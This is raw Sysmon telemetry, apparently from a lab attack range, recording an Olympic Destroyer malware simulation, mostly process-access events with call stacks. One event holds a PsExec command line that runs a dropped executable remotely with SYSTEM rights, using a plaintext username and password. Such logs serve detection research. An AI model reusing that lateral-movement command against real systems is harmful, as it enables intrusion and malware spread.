10:56:47.259{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.259{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.244{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8805-000000003802}4408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.228{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8805-000000003802}4408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.228{C8EA50B7-12EF-6216-8805-000000003802}44085264C:\Windows\system32\conhost.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.212{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8805-000000003802}4408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.197{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8805-000000003802}4408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.144{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.128{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.128{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.128{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000291243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.097{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DE6E47016F29648AB7D3EB96479C1F5,SHA256=355C57345F803046013CB64DA3E065BF09CB5587507074304609B7122A75B29C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.081{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8605-000000003802}5268C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.081{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8605-000000003802}5268C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.081{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.081{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.081{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.066{C8EA50B7-12EF-6216-8605-000000003802}52686256C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.066{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.079{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 13241300x8000000000000000291234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.066{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.066{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.066{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.062{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.062{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.044{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8605-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000291228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.044{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.044{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8605-000000003802}5268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.028{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8505-000000003802}4820C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.028{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8505-000000003802}4820C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.997{C8EA50B7-12EE-6216-8505-000000003802}48206732C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12EF-6216-8304-000000003902}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 